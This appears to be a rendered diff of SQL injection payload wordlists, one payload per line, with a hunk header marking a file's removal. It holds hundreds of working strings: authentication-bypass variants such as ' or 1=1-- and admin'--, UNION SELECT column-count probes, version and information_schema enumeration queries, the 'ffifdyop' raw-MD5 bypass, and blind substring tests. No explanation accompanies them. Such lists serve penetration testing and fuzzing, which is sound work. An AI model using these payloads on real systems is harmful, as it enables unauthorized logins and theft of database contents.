'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
